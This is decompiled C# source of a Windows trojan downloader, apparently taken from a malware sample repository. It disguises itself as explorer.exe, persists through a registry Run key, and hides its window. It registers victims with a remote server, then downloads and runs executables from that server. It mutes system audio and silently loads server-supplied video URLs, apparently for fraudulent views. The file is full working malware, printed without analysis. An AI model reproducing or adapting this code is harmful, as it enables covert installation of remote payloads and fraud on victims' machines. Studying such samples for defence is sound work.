// Decompiled with JetBrains decompiler // Type: mute.Form1 // Assembly: explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 772D6407-3F7F-4A01-A630-EF8C6D749DE8 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8.exe using Microsoft.Win32; using System; using System.ComponentModel; using System.Diagnostics; using System.Drawing; using System.IO; using System.Net; using System.Runtime.InteropServices; using System.Threading; using System.Web; using System.Windows.Forms; namespace mute { public class Form1 : Form { private const int FEATURE_DISABLE_NAVIGATION_SOUNDS = 21; private const int SET_FEATURE_ON_THREAD = 1; private const int SET_FEATURE_ON_PROCESS = 2; private const int SET_FEATURE_IN_REGISTRY = 4; private const int SET_FEATURE_ON_THREAD_LOCALMACHINE = 8; private const int SET_FEATURE_ON_THREAD_INTRANET = 16; private const int SET_FEATURE_ON_THREAD_TRUSTED = 32; private const int SET_FEATURE_ON_THREAD_INTERNET = 64; private const int SET_FEATURE_ON_THREAD_RESTRICTED = 128; private IContainer components = (IContainer) null; private Panel panel1; private Button button1; private Panel panel2; private WebBrowser web; private TextBox txtUrl; private CheckBox chkMute; private Panel panel3; private TextBox txtLog; private CheckBox chkDouble; private BackgroundWorker worker; private Button btnSetting; private CheckBox chkHide; private Button btnDisableAutostart; private Button button2; private string APP_VER = ""; private string DATA_VER = ""; private string DATA = ""; private int START_NO = 0; private string USERID = ""; private string MEMO = ""; private bool DONE = false; private bool SupportMuteApplication = false; private string URL = ""; private int PING_HITS = 5; private int PING_SECONDS = 60; private int DELAY = 0; private bool LOG = false; protected override void Dispose(bool disposing) { if (disposing && this.components != null) this.components.Dispose(); base.Dispose(disposing); } private void InitializeComponent() { this.panel1 = new Panel(); this.button2 = new Button(); this.btnDisableAutostart = new Button(); this.chkHide = new CheckBox(); this.btnSetting = new Button(); this.chkDouble = new CheckBox(); this.chkMute = new CheckBox(); this.txtUrl = new TextBox(); this.button1 = new Button(); this.panel2 = new Panel(); this.web = new WebBrowser(); this.panel3 = new Panel(); this.txtLog = new TextBox(); this.worker = new BackgroundWorker(); this.panel1.SuspendLayout(); this.panel2.SuspendLayout(); this.panel3.SuspendLayout(); this.SuspendLayout(); this.panel1.Controls.Add((Control) this.button2); this.panel1.Controls.Add((Control) this.btnDisableAutostart); this.panel1.Controls.Add((Control) this.chkHide); this.panel1.Controls.Add((Control) this.btnSetting); this.panel1.Controls.Add((Control) this.chkDouble); this.panel1.Controls.Add((Control) this.chkMute); this.panel1.Controls.Add((Control) this.txtUrl); this.panel1.Controls.Add((Control) this.button1); this.panel1.Dock = DockStyle.Top; this.panel1.Location = new Point(0, 0); this.panel1.Name = "panel1"; this.panel1.Size = new Size(604, 87); this.panel1.TabIndex = 0; this.button2.Location = new Point(167, 41); this.button2.Name = "button2"; this.button2.Size = new Size(49, 23); this.button2.TabIndex = 7; this.button2.Text = "Nav"; this.button2.UseVisualStyleBackColor = true; this.button2.Click += new EventHandler(this.button2_Click); this.btnDisableAutostart.Location = new Point(222, 41); this.btnDisableAutostart.Name = "btnDisableAutostart"; this.btnDisableAutostart.Size = new Size(136, 23); this.btnDisableAutostart.TabIndex = 6; this.btnDisableAutostart.Text = "Disable Autostart"; this.btnDisableAutostart.UseVisualStyleBackColor = true; this.btnDisableAutostart.Click += new EventHandler(this.btnDisableAutostart_Click); this.chkHide.AutoSize = true; this.chkHide.Location = new Point(366, 16); this.chkHide.Name = "chkHide"; this.chkHide.Size = new Size(48, 16); this.chkHide.TabIndex = 5; this.chkHide.Text = "Hide"; this.chkHide.UseVisualStyleBackColor = true; this.chkHide.CheckedChanged += new EventHandler(this.chkHide_CheckedChanged); this.btnSetting.Location = new Point(277, 12); this.btnSetting.Name = "btnSetting"; this.btnSetting.Size = new Size(81, 23); this.btnSetting.TabIndex = 4; this.btnSetting.Text = "User Data"; this.btnSetting.UseVisualStyleBackColor = true; this.btnSetting.Click += new EventHandler(this.btnSetting_Click); this.chkDouble.AutoSize = true; this.chkDouble.Checked = true; this.chkDouble.CheckState = CheckState.Checked; this.chkDouble.Location = new Point(502, 16); this.chkDouble.Name = "chkDouble"; this.chkDouble.Size = new Size(96, 16); this.chkDouble.TabIndex = 3; this.chkDouble.Text = "Double Check"; this.chkDouble.UseVisualStyleBackColor = true; this.chkMute.AutoSize = true; this.chkMute.Checked = true; this.chkMute.CheckState = CheckState.Checked; this.chkMute.Location = new Point(420, 16); this.chkMute.Name = "chkMute"; this.chkMute.Size = new Size(78, 16); this.chkMute.TabIndex = 2; this.chkMute.Text = "Auto Mute"; this.chkMute.UseVisualStyleBackColor = true; this.txtUrl.Location = new Point(3, 14); this.txtUrl.Name = "txtUrl"; this.txtUrl.Size = new Size(213, 21); this.txtUrl.TabIndex = 1; this.txtUrl.Text = "http://www.youtube.com/watch?v=WwfNexdaIdU&feature=topvideos"; this.button1.Location = new Point(222, 12); this.button1.Name = "button1"; this.button1.Size = new Size(49, 23); this.button1.TabIndex = 0; this.button1.Text = "Go"; this.button1.UseVisualStyleBackColor = true; this.button1.Click += new EventHandler(this.button1_Click); this.panel2.Controls.Add((Control) this.web); this.panel2.Dock = DockStyle.Fill; this.panel2.Location = new Point(0, 87); this.panel2.Name = "panel2"; this.panel2.Size = new Size(604, 98); this.panel2.TabIndex = 1; this.web.Dock = DockStyle.Fill; this.web.Location = new Point(0, 0); this.web.MinimumSize = new Size(20, 20); this.web.Name = "web"; this.web.Size = new Size(604, 98); this.web.TabIndex = 0; this.web.ProgressChanged += new WebBrowserProgressChangedEventHandler(this.web_ProgressChanged); this.web.DocumentCompleted += new WebBrowserDocumentCompletedEventHandler(this.web_DocumentCompleted); this.panel3.Controls.Add((Control) this.txtLog); this.panel3.Dock = DockStyle.Bottom; this.panel3.Location = new Point(0, 185); this.panel3.Name = "panel3"; this.panel3.Size = new Size(604, 137); this.panel3.TabIndex = 3; this.txtLog.Dock = DockStyle.Fill; this.txtLog.Location = new Point(0, 0); this.txtLog.Multiline = true; this.txtLog.Name = "txtLog"; this.txtLog.Size = new Size(604, 137); this.txtLog.TabIndex = 0; this.worker.WorkerReportsProgress = true; this.worker.DoWork += new DoWorkEventHandler(this.worker_DoWork); this.worker.RunWorkerCompleted += new RunWorkerCompletedEventHandler(this.worker_RunWorkerCompleted); this.worker.ProgressChanged += new ProgressChangedEventHandler(this.worker_ProgressChanged); this.AutoScaleDimensions = new SizeF(6f, 12f); this.AutoScaleMode = AutoScaleMode.Font; this.ClientSize = new Size(604, 322); this.Controls.Add((Control) this.panel2); this.Controls.Add((Control) this.panel1); this.Controls.Add((Control) this.panel3); this.Name = nameof (Form1); this.Text = nameof (Form1); this.WindowState = FormWindowState.Minimized; this.Load += new EventHandler(this.Form1_Load); this.panel1.ResumeLayout(false); this.panel1.PerformLayout(); this.panel2.ResumeLayout(false); this.panel3.ResumeLayout(false); this.panel3.PerformLayout(); this.ResumeLayout(false); } [DllImport("urlmon.dll")] [return: MarshalAs(UnmanagedType.Error)] private static extern int CoInternetSetFeatureEnabled( int FeatureEntry, [MarshalAs(UnmanagedType.U4)] int dwFlags, bool fEnable); public Form1() => this.InitializeComponent(); private void Nav(string url) => this.web.Navigate(url); private void StopNav() { this.web.Stop(); while (this.web.IsBusy) Thread.Sleep(2000); } private void RemoveAutoStart(string name) { RegistryKey localMachine = Registry.LocalMachine; RegistryKey subKey = localMachine.CreateSubKey("SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\"); try { subKey.DeleteValue(name); localMachine.Close(); } catch (Exception ex) { } } private bool AutoStart(string name, string path) { RegistryKey localMachine = Registry.LocalMachine; bool flag = false; try { localMachine.CreateSubKey("SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\").SetValue(name, (object) path); localMachine.Close(); flag = true; } catch (Exception ex) { int num = (int) MessageBox.Show("Please run this app as Administrator so it can be installed correctly..."); } return flag; } protected override void SetVisibleCore(bool value) { if (this.IsHide()) { base.SetVisibleCore(false); this.init(); } else base.SetVisibleCore(true); } private void DoWork() { while (true) { this.SupportMuteApplication = this.MuteApplication(); string[] strArray = this.DATA.Split('\n'); int hits = 0; int startNo = this.START_NO; DateTime now = DateTime.Now; for (int index1 = this.START_NO + 1; index1 < strArray.Length; ++index1) { try { string s = strArray[index1].Trim(); if (!(s == "") && !char.IsDigit(s, 0)) { if (!s.StartsWith("http://", StringComparison.InvariantCultureIgnoreCase)) s = "http://" + s; string str1 = s.Replace("http://il.", "http://www."); this.DONE = false; this.URL = str1.ToUpper(); this.worker.ReportProgress(0, (object) string.Format("No {0} video begin:{1}", (object) (startNo + 1), (object) str1)); bool flag = str1.StartsWith("http://www.youtube.com", StringComparison.InvariantCultureIgnoreCase); if (!this.SupportMuteApplication && !flag) { ++startNo; this.worker.ReportProgress(0, (object) string.Format("Skip {0} on OS lower than vista!", (object) (startNo + 1))); Thread.Sleep(500); } else { this.web.Invoke((Delegate) new Form1.NavTo(this.Nav), (object) str1); for (int index2 = 0; !this.DONE && index2 < 60; ++index2) Thread.Sleep(2000); if (this.DONE) this.worker.ReportProgress(0, (object) string.Format("Page load finished!Sleep {0} ms...", (object) this.DELAY)); else this.worker.ReportProgress(0, (object) string.Format("Time out!Sleep {0} ms...", (object) this.DELAY)); Thread.Sleep(this.DELAY); TimeSpan timeSpan = DateTime.Now - now; if (this.DONE) ++hits; this.LogLocal(string.Format("TS:{0},PingSecond:{1},Hits:{2},PingHits:{3}\r\n", (object) (int) timeSpan.TotalSeconds, (object) this.PING_SECONDS, (object) hits, (object) this.PING_HITS)); if (hits > this.PING_HITS || (int) timeSpan.TotalSeconds > this.PING_SECONDS) { string str2 = this.Ping(hits); hits = 0; now = DateTime.Now; if (str2.Trim() == "config") this.ConfigClient(this.USERID, this.MEMO); } System.IO.File.WriteAllText(this.GetProcessFile(), index1.ToString()); ++startNo; if (this.DONE) this.worker.ReportProgress(0, (object) string.Format("No {0} video finished:{1}", (object) startNo, (object) str1)); else this.worker.ReportProgress(0, (object) string.Format("No {0} video failed:{1}", (object) startNo, (object) str1)); } } } catch (Exception ex) { this.worker.ReportProgress(0, (object) string.Format("Raise exception in worker loop:{0}", (object) ex.Message)); ++startNo; } } this.RefreshData(); this.START_NO = 0; } } private void web_DocumentCompleted(object sender, WebBrowserDocumentCompletedEventArgs e) { string upper1 = e.Url.AbsoluteUri.ToUpper(); bool flag = this.URL.StartsWith("HTTP://WWW.YOUTUBE.COM/WATCH"); if (flag && upper1.StartsWith("HTTP://WWW.YOUTUBE.COM/WATCH")) { int num1 = -99; int num2 = 0; this.Log(upper1); while (num1 == -99 && num2 < 10) { ++num2; HtmlElement elementById = this.web.Document.GetElementById("movie_player"); try { num1 = (int) elementById.InvokeMember("getPlayerState"); elementById.InvokeMember("mute"); this.Log("Mute successfully!"); this.DONE = true; } catch (Exception ex) { this.Log("Mute failed:" + ex.Message + ",will try again..."); } Thread.Sleep(300); } } if (flag && this.DONE && this.chkDouble.Checked) this.web.Navigate("javascript:document.getElementById('movie_player').mute();"); string upper2 = ((WebBrowser) sender).Document.Url.ToString().ToUpper(); if (flag || !(this.URL == upper1) && !(this.URL + "/" == upper1) || !(this.URL == upper2) && !(this.URL + "/" == upper2) || ((WebBrowser) sender).IsOffline) return; this.DONE = true; } private void LogLocal(string msg) => System.IO.File.AppendAllText(Path.Combine(Application.UserAppDataPath, "log.txt"), msg + Environment.NewLine); private void FormLog(string msg) { TextBox txtLog = this.txtLog; txtLog.Text = txtLog.Text + DateTime.Now.ToString("G") + msg + "\r\n"; this.txtLog.SelectAll(); this.txtLog.ScrollToCaret(); this.txtLog.Select(0, 0); } private void Log(string msg) { if (this.LOG) { string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) this.USERID, (object) this.MEMO, (object) HttpUtility.UrlEncode(msg)); WebClient webClient = new WebClient(); try { webClient.DownloadString(address); } catch (Exception ex) { msg = msg + " #Log to server failed." + ex.Message; } } if (this.txtLog.InvokeRequired) { this.txtLog.Invoke((Delegate) (() => { TextBox txtLog = this.txtLog; txtLog.Text = txtLog.Text + DateTime.Now.ToString("G") + msg + "\r\n"; this.txtLog.SelectAll(); this.txtLog.ScrollToCaret(); this.txtLog.Select(0, 0); })); } else { TextBox txtLog = this.txtLog; txtLog.Text = txtLog.Text + DateTime.Now.ToString("G") + msg + "\r\n"; this.txtLog.SelectAll(); this.txtLog.ScrollToCaret(); this.txtLog.Select(0, 0); Application.DoEvents(); } } private void button1_Click(object sender, EventArgs e) => this.Go(); private void Go() { this.web.ScriptErrorsSuppressed = true; Form1.CoInternetSetFeatureEnabled(21, 2, true); string processFile = this.GetProcessFile(); this.START_NO = 0; if (System.IO.File.Exists(this.GetProcessFile())) { string[] strArray = System.IO.File.ReadAllLines(processFile); if (strArray.Length > 1) int.TryParse(strArray[0], out this.START_NO); } this.worker.RunWorkerAsync(); } private void web_ProgressChanged(object sender, WebBrowserProgressChangedEventArgs e) { } private string Ping(int hits) { WebClient webClient = new WebClient(); string address = string.Format("http://isthisactuallyadomain.info/ping.php?user={0}&memo={1}&version={2}&profile={3}", (object) this.USERID, (object) this.MEMO, (object) "20110123", (object) Environment.OSVersion.VersionString); if (hits > 0) address = address + "&hits=" + hits.ToString(); return webClient.DownloadString(address); } private string GetUserDataPath() => Application.UserAppDataPath; private string GetProcessFile() => this.GetUserDataPath() + "\\process.txt"; private string GetConfigFile() => this.GetUserDataPath() + "\\config.txt"; private string GetUserFile() => this.GetUserDataPath() + "\\user.txt"; private bool IsHide() => System.IO.File.Exists(Path.Combine(Application.UserAppDataPath, "hide.txt")); private int GetAffiliateID() { FileStream fileStream = System.IO.File.OpenRead(Application.ExecutablePath); fileStream.Seek(-1L, SeekOrigin.End); return fileStream.ReadByte(); } private void HideMe() { this.Opacity = 0.0; this.ShowInTaskbar = false; System.IO.File.WriteAllText(Path.Combine(Application.UserAppDataPath, "hide.txt"), "empty"); } private void Form1_Load(object sender, EventArgs e) { this.Text = Application.ExecutablePath; this.init(); } private bool MuteApplication() { if (Environment.OSVersion.Version.Major <= 5) return false; Form1.SetVolume(0); return true; } private bool UnMuteApplication() { if (Environment.OSVersion.Version.Major <= 5) return false; Form1.SetVolume((int) ushort.MaxValue); return true; } [DllImport("winmm.dll")] private static extern int waveOutGetVolume(IntPtr hwo, out uint dwVolume); [DllImport("winmm.dll")] private static extern int waveOutSetVolume(IntPtr hwo, uint dwVolume); public static int GetVolume() { uint dwVolume = 0; Form1.waveOutGetVolume(IntPtr.Zero, out dwVolume); return (int) (ushort) (dwVolume & (uint) ushort.MaxValue) / 6553; } public static void SetVolume(int volume) { int num = 6553 * volume; uint dwVolume = (uint) (num & (int) ushort.MaxValue | num << 16); Form1.waveOutSetVolume(IntPtr.Zero, dwVolume); } public void Clean() { this.RemoveAutoStart("mute"); Directory.Delete(Application.UserAppDataPath, true); } public void ShowAffiateID() { int num = (int) MessageBox.Show(this.GetAffiliateID().ToString()); Application.Exit(); } private void init() { string configFile = this.GetConfigFile(); if (System.IO.File.Exists(configFile)) { string[] strArray = System.IO.File.ReadAllLines(configFile); if (strArray.Length > 3) { this.APP_VER = strArray[0]; this.DATA_VER = strArray[2]; this.DATA = string.Join("\n", strArray, 4, strArray.Length - 4); } } this.Log("Check upgrade app.ver20110123"); WebClient webClient = new WebClient(); string[] strArray1 = webClient.DownloadString("http://isthisactuallyadomain.info/check_update.php").Split('\n'); this.LogLocal("Generate updater"); string str1 = Path.Combine(Application.UserAppDataPath, "updater.exe"); if (Path.GetDirectoryName(Application.ExecutablePath) != Application.UserAppDataPath) { if (!this.AutoStart("mute", str1)) { Application.Exit(); } else { if (!System.IO.File.Exists(str1)) { webClient.DownloadFile(strArray1[1], str1); this.Log("updater installed:" + str1); } this.GetUserID(); Process.Start(str1); this.Log("launch updater ok" + str1); Application.Exit(); } } else { if (this.IsHide()) this.HideMe(); this.GetUserID(); this.ConfigClient(this.USERID, this.MEMO); this.Log("Config client ok."); string str2 = webClient.DownloadString(string.Format("http://isthisactuallyadomain.info/check_update.php?user={0}&memo={1}", (object) this.USERID, (object) this.MEMO)); string[] contents = str2.Split('\n'); this.Log("Check update info ok:" + str2); string str3 = Path.Combine(Application.UserAppDataPath, "explorer.exe"); if (str3 != Application.ExecutablePath) { if (string.Compare(this.APP_VER, contents[0]) < 0) { webClient.DownloadFile(contents[1], str3); this.Log("app upgraded:" + str3); } if (!System.IO.File.Exists(str3)) webClient.DownloadFile(contents[1], str3); Process.Start(str3); this.Log("launch app ok" + str3); this.LogLocal("Launch app"); Application.Exit(); } else { this.APP_VER = contents[0]; string str4 = contents[1]; string address = contents[3]; if (string.Compare(this.DATA_VER, contents[2]) < 0) { this.DATA = webClient.DownloadString(address); this.DATA_VER = contents[2]; this.Log("Data upgraded:" + address); } System.IO.File.WriteAllLines(configFile, contents); System.IO.File.AppendAllText(configFile, this.DATA); this.Log("About to start the worker loop"); this.LogLocal("Start worker loop.ver20110123"); this.Go(); } } } private void GetUserID() { this.LogLocal("Register or get user id."); string userFile = this.GetUserFile(); if (System.IO.File.Exists(userFile)) { string[] strArray = System.IO.File.ReadAllLines(userFile); this.USERID = strArray[0]; this.MEMO = strArray[1]; } else { this.Register("friend"); string[] contents = new string[2] { this.USERID, this.MEMO }; System.IO.File.WriteAllLines(userFile, contents); } this.Ping(0); this.LogLocal("Open data file"); this.Log("Get userid&meo from :" + userFile); } private void ConfigClient(string userid, string memo) { string[] strArray = new WebClient().DownloadString(string.Format("http://isthisactuallyadomain.info/config.php?user={0}&memo={1}", (object) userid, (object) memo)).Split('\n'); int.TryParse(strArray[0].Trim(), out this.PING_SECONDS); int.TryParse(strArray[1].Trim(), out this.PING_HITS); if (strArray[2].Trim() == "Log") this.LOG = true; int.TryParse(strArray[3].Trim(), out this.DELAY); this.DELAY *= 1000; } private void RefreshData() { try { WebClient webClient = new WebClient(); string[] contents = webClient.DownloadString(string.Format("http://isthisactuallyadomain.info/check_update.php?user={0}&memo={1}", (object) this.USERID, (object) this.MEMO)).Split('\n'); if (contents.Length < 4) return; this.APP_VER = contents[0]; string str = contents[1]; string address = contents[3]; if (string.Compare(this.DATA_VER, contents[2]) < 0) { string configFile = this.GetConfigFile(); this.DATA = webClient.DownloadString(address); this.DATA_VER = contents[2]; System.IO.File.WriteAllLines(configFile, contents); System.IO.File.AppendAllText(configFile, this.DATA); } } catch (Exception ex) { this.worker.ReportProgress(0, (object) ("Raise a exception in RefreshData:" + ex.Message)); } } private void Register(string affiliate) { this.MEMO = DateTime.Now.Ticks.ToString(); this.USERID = new WebClient().DownloadString(string.Format("http://isthisactuallyadomain.info/register.php?memo={0}&affiliate={1}&profile={2}", (object) this.MEMO, (object) affiliate, (object) Environment.OSVersion.VersionString)).Trim(); this.Log(string.Format("Register with server ok:{0},{1}", (object) this.USERID, (object) this.MEMO)); } private void worker_DoWork(object sender, DoWorkEventArgs e) => this.DoWork(); private void worker_ProgressChanged(object sender, ProgressChangedEventArgs e) => this.Log((string) e.UserState); private void worker_RunWorkerCompleted(object sender, RunWorkerCompletedEventArgs e) => this.Log("Done!"); private void btnSetting_Click(object sender, EventArgs e) => Process.Start(Application.UserAppDataPath); private void chkHide_CheckedChanged(object sender, EventArgs e) { if (!this.chkHide.Checked) return; this.WindowState = FormWindowState.Minimized; this.HideMe(); } private void btnDisableAutostart_Click(object sender, EventArgs e) => this.RemoveAutoStart("mute"); private void button2_Click(object sender, EventArgs e) { this.web.Stop(); this.web.Navigate(this.txtUrl.Text); } private delegate void NavTo(string url); private delegate void StopWeb(); private delegate void UICode(); } }